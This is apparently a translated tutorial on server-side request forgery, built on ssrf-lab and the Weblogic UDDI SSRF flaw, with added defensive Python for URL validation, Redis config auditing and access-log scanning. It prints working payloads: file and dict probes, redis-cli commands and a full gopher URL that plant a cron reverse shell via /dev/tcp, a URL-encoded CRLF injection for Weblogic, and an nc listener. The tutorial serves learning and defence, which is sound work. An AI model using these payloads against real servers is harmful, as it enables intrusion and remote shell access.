Preface:
This article first appeared in the Prophet community. It combines a real vulnerability with ssrf-lab to study SSRF.
To learn something new, this time we study SSRF by working through the Weblogic SSRF vulnerability and ssrf-lab.
0x00 Understanding SSRF
SSRF profile:
SSRF (Server-Side Request Forgery) is a forged request issued by the server: the attacker abuses a request that the server itself initiates, and so bypasses the restriction that a client cannot reach certain data. Essentially it belongs to the information-disclosure class of vulnerabilities.
SSRF vulnerability principle:
SSRF mostly arises because the server offers a feature that fetches data from other servers, and the application neither filters nor restricts the destination address. Examples are fetching the text of a web page at a specified URL, loading an image from a specified address, downloading a file, and so on. In most web architectures the web server can reach both the Internet and the intranet it sits in, so an attacker can supply an address that makes the back-end server initiate a request to any target and return the data of that request.
In general the target of an SSRF attack is an internal system that cannot be reached from outside (the intranet), so SSRF can be summed up in one sentence: use a service that can initiate network requests as a springboard to attack other internal services.
gopher, dict protocol, the redis service, and the curl command
The gopher protocol can do many things and plays an important role in many SSRF cases. With it one can reach intranet FTP, Telnet, Redis and Memcache services, and both GET and POST requests can be issued.
The dict protocol is a Dictionary Server Protocol: it allows a client to query several dictionaries over the course of the protocol, and the server listens on port 2628.
The redis service is open on port 6379.
These are generally looked up in order to know what they are useful for.
The curl command plays a very important role in SSRF, so here is a brief introduction to it:
curl is a commonly used command-line tool for making requests to web servers. Its name means a client tool for URLs.
With no parameters, curl issues a GET request:
$ curl https://www.example.com
The command above issues a GET request to www.example.com, and the content returned by the server is printed on the command line.
-v
The -v parameter prints the entire communication process, for debugging. With -v we can read files through other protocols:
Using the file protocol: curl -v file:///etc/passwd
Using the ftp protocol: curl -v "ftp://127.0.0.1:<port>/info"
Using the dict protocol: curl -v "dict://127.0.0.1:<port>/info"
Using the gopher protocol: curl -v "gopher://127.0.0.1:<port>/_info"
For other parameters, refer to the curl documentation.
Common intranet IP segments
Private LAN address ranges fall into three classes; the corresponding IP segments are:
Class C: 192.168.0.0 - 192.168.255.255
Class B: 172.16.0.0 - 172.31.255.255
Class A: 10.0.0.0 - 10.255.255.255
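As a defensive counterpart to these ranges, here is an added example (my code, not from the original article or from ssrf-lab) of the check a server-side fetcher should run before making any outbound request: it allows only http and https, resolves the hostname, and rejects every address that falls in the three private ranges above, or in loopback, link-local or the unspecified block. The function names and the `resolver` hook are assumptions of the example.

```python
# Added example: an allow-list validator a server-side fetcher applies before
# issuing an outbound request. Function names and the resolver hook are assumptions.
import ipaddress
import socket
from urllib.parse import urlsplit

# The three private blocks from the article, plus loopback, link-local, the
# unspecified block and their IPv6 counterparts.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",
    "::1/128", "fc00::/7", "fe80::/10", "::/128",
)]
ALLOWED_SCHEMES = {"http", "https"}


def is_blocked_ip(text):
    """True if the address lies in a range a fetcher must never contact."""
    ip = ipaddress.ip_address(text)
    # ::ffff:10.0.0.1 is really 10.0.0.1; compare it as IPv4.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def default_resolver(host):
    """Every address the name resolves to; all of them must pass the check."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def validate_outbound_url(url, resolver=default_resolver):
    """Return (ok, reason). ok is True only when url is safe to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    try:
        # Shorthand forms such as 127.1 or 2130706433 are not IP literals to
        # ipaddress; they go through the resolver, which normalises them.
        addrs = [host] if _is_ip_literal(host) else resolver(host)
    except (socket.gaierror, OSError):
        return False, f"cannot resolve {host!r}"
    for addr in addrs:
        if is_blocked_ip(addr):
            return False, f"{host} resolves to blocked address {addr}"
    return True, "ok"
```

The check is only as good as what happens next: the fetch must connect to the address that was validated (not resolve the name a second time) and must not follow redirects, otherwise a DNS rebinding or a 302 to an internal address bypasses it.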
Finding and using SSRF vulnerabilities:
A site with SSRF mainly uses four protocols: http, file, gopher and dict.
The file protocol reads local files.
The http protocol scans intranet IPs and probes ports; if port 6379 is found open, the http, gopher and dict protocols can all be used against the redis service on that port.
As the figure shows, there are many ways to find and use SSRF. Theory alone is not enough to understand it, so we practise below:
0x01 ssrf-lab
OUTGOING WEBHOOK: the input https://yourhandler.io/events is the REST API endpoint to be monitored; after testing, the SEE THE RESULT section shows the response to the request and its status code.
First test 127.0.0.1: the response data is echoed back, which shows that intranet IPs are not restricted.
As described above, SSRF can read files through several protocols; test that here:
Using file:///etc/passwd to read the passwd file, we find that it can be read.
With this protocol any file on the host can be read, so configuration files and source code can easily be obtained for further penetration. This succeeds because there is no rigorous URL filtering, so the protocol can be used to read arbitrary files.
The redis service was introduced above, and in many SSRF write-ups the protocols are used in combination with the Redis service, so first install the service inside the ssrf-basics container:
$ docker ps # list containers to find the container id
$ docker exec -it <container-id> /bin/bash # enter the container
$ apt-get install redis-server # install the redis service
$ redis-server # start the redis service
After installing, the protocols can be used to gather information and obtain a reverse shell.
Using the dict protocol, dict://127.0.0.1:6379/info returns the configuration information of the local redis service.
Using dict://127.0.0.1:6379/KEYS * returns the contents stored in redis.
That is the simple use of the dict protocol; in addition, the gopher protocol can be used to attack redis.
Redis on an intranet often has an unauthorized-access vulnerability. When the Redis service runs as root, attacking the intranet Redis through the Gopher protocol can obtain a reverse shell by writing a scheduled task.
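The technique just described only works when the Redis instance is reachable from the SSRF host, accepts commands without a password, and still has CONFIG SET available. The following added example (my code, not from the article) audits a redis.conf for exactly those preconditions; both sample configurations are constructed for the example.

```python
# Added example: audit a redis.conf for the settings that turn an SSRF
# pivot into an unauthenticated Redis with CONFIG SET available.
# Both sample configs are constructed for this example.

WEAK_CONFIG = """\
# constructed: the kind of config found on an exposed intranet Redis
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONFIG = """\
# constructed: loopback only, password required, dangerous commands disabled
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""


def parse_redis_conf(text):
    """Map each directive name (lower-cased) to the list of its values, in file order."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, rest = line.partition(" ")
        directives.setdefault(name.lower(), []).append(rest.strip())
    return directives


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checked weaknesses is present."""
    d = parse_redis_conf(text)
    findings = []

    # 1. Network exposure: no bind directive, or bound to every interface.
    binds = " ".join(d.get("bind", []))
    if not binds or "0.0.0.0" in binds or "*" in binds:
        findings.append("no bind directive or bound to all interfaces")

    # 2. protected-mode (Redis >= 3.2) refuses non-loopback clients when no password is set.
    if d.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode disabled")

    # 3. Without requirepass any client that can open a TCP connection is authenticated.
    password = d.get("requirepass", [""])[-1].strip('"')
    if not password:
        findings.append("no requirepass: unauthenticated access")

    # 4. The article's technique needs CONFIG SET dir/dbfilename and uses FLUSHALL.
    renamed = {v.split()[0].upper() for v in d.get("rename-command", []) if v.split()}
    for cmd in ("CONFIG", "FLUSHALL"):
        if cmd not in renamed:
            findings.append(f"{cmd} command not renamed or disabled")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_redis_conf(conf) or ["no findings"])
```

Two things the file cannot tell you: whether the process runs as root (the article's cron-file write needs that; run it as an unprivileged user), and whether authentication is instead configured through Redis 6+ ACL `user` directives, in which case the requirepass finding is informational.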
First look at the Redis commands of a normal attack, then convert them into a Gopher protocol URL:
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
// redis-cli: view all keys and clear all data
This is the common exploit; simply change the IP and port to your own. Converted into a Gopher protocol URL:
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
After URL-decoding it reads:
gopher://127.0.0.1:6379/_*1 $8 flushall *3 $3 set $1 1 $64 */1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1 *4 $6 config $3 set $3 dir $16 /var/www/html/ *4 $6 config $3 set $10 dbfilename $4 root *1 $4 save quit
Testing it, we found an echo.
Then, inside the ssrf-lab/basics container, view the inserted KEY value to verify that it succeeded.
The Gopher protocol can also be used to attack FastCGI and vulnerable web applications inside the intranet. For details, refer to "Using the Gopher protocol to expand the attack surface".
0x02: Weblogic SSRF Vulnerability
Weblogic has an SSRF vulnerability; exploiting it sends arbitrary HTTP requests, which can then be used against redis, fastcgi and other vulnerable components on the intranet.
The vulnerability is located at http://192.168.186.130:7001/uddiexplorer//uddiexplorer/SearchPublicRegistries.jsp
According to Google Translate, this page searches a private registry; above it there is a public registry, where you can choose Microsoft or IBM, i.e. the URL address from which the page content is fetched.
After filling in some content, we find that the request is a GET request, so the parameters can be constructed directly. We change the specified URL a little and see what results appear; first we must find out what each parameter corresponds to.
Constructed parameters:
?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
After initiating the request, we find that a reachable port generally returns an error with a status code, while a port that is not open returns "could not connect over HTTP to server". In this way the state of the intranet can be probed.
In addition, the Weblogic SSRF has a relatively large feature: although it is a GET request, %0a%0d can be passed in to inject newlines. Since each redis command is separated by a line break, the redis server on the intranet can be attacked through the SSRF.
Since an SSRF attack is possible, a reverse shell can be obtained by injecting HTTP headers and using Redis.
First probe the intranet for redis servers through the SSRF; testing shows that 172.18.0.2:6379 is reachable (docker is used here to build the environment, and the docker network is generally 172.*; but my request here always timed out, so the screenshot below is the original author's).
Thus we know that in the docker environment the address 172.18.0.2 is running a Redis service on port 6379.
Then send three redis commands that write a reverse-shell script into /etc/crontab:
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.186.130/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa
Because it is passed in a GET request, it is URL-encoded:
%74%65%73%74%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%38%36%2e%31%33%30%2f%34%34%34%34%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%73%61%76%65%61%61%61
Before initiating the request, listen on port 4444:
nc -lvp 4444
Some time after the request, the shell is successfully received.
A small problem appeared during my reproduction: access to http://172.18.0.2:6379/ timed out. But the purpose of reproducing this vulnerability is also to learn SSRF, and having learned something here, the reproduction was not in vain.
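From the detection side, the file/dict/gopher abuse in the ssrf-lab section and the %0d%0a injection in the Weblogic section all leave traces in the web server's access log: a URL-typed parameter whose scheme is not http(s), whose host is an intranet or loopback address, or whose decoded value contains a CRLF. The following added example (my code, not part of the article) scans constructed access-log lines for those three signs. The `/fetch?url=` endpoint and the log lines are assumptions of the example; the SearchPublicRegistries.jsp parameter names come from the article.

```python
# Added example: flag SSRF-style values in web-server access logs.
# Log lines are constructed; the /fetch?url= endpoint is an assumption.
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SAMPLE_LOG = '''
10.1.1.5 - - [01/Jan/2024:10:00:00 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&operator=http%3A%2F%2F127.0.0.1%3A7001 HTTP/1.1" 200 512
10.1.1.5 - - [01/Jan/2024:10:00:01 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&operator=http%3A%2F%2F172.18.0.2%3A6379%2Ftest%0d%0aconfig%20set%20dir%20%2Fetc%2F%0d%0a HTTP/1.1" 200 512
10.1.1.9 - - [01/Jan/2024:10:00:02 +0000] "POST /webhook HTTP/1.1" 200 64
10.1.1.7 - - [01/Jan/2024:10:00:03 +0000] "GET /fetch?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 2048
10.1.1.7 - - [01/Jan/2024:10:00:04 +0000] "GET /fetch?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A1%0d%0a%248%0d%0aflushall HTTP/1.1" 200 12
10.1.1.8 - - [01/Jan/2024:10:00:05 +0000] "GET /fetch?url=https%3A%2F%2Fwww.example.com%2Fevents HTTP/1.1" 200 300
'''

# Combined-log-format prefix: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d+)'
)
SUSPECT_SCHEMES = {"file", "dict", "gopher", "ftp"}
SCHEME_RE = re.compile(r"([a-zA-Z][a-zA-Z0-9+.-]*)://")


def inspect_param_value(value):
    """Reasons a single (already percent-decoded) parameter value looks like an SSRF attempt."""
    decoded = unquote(value)          # catch a second layer of encoding
    reasons = []
    if "\r" in decoded or "\n" in decoded:
        reasons.append("CRLF in parameter")  # protocol smuggling, as in the Weblogic case
    m = SCHEME_RE.match(decoded)
    if not m:
        return reasons
    scheme = m.group(1).lower()
    if scheme in SUSPECT_SCHEMES:
        reasons.append(f"{scheme}:// scheme")
    # Only the first line is the URL the fetcher sees; anything after a CRLF is injected.
    first_line = decoded.split("\r")[0].split("\n")[0]
    host = urlsplit(first_line).hostname
    if host:
        try:
            ip = ipaddress.ip_address(host)
            if ip.is_private or ip.is_loopback or ip.is_link_local:
                reasons.append(f"internal target host {host}")
        except ValueError:
            if host == "localhost":
                reasons.append("internal target host localhost")
    return reasons


def scan_access_log(text):
    """Return one alert dict per query parameter that triggers at least one reason."""
    alerts = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("path")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = inspect_param_value(value)
            if reasons:
                alerts.append({"src": m.group("src"), "ts": m.group("ts"),
                               "param": name, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

The scan only sees query strings, so for endpoints that take the URL in a POST body (ssrf-lab's webhook form is one) the same `inspect_param_value` check has to run on the application's own request log or inside the application before the fetch is made.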